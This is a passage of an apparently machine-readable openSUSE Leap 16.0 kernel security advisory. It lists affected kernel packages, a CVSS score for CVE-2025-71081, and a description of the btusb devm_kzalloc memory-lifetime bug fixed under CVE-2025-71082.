"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
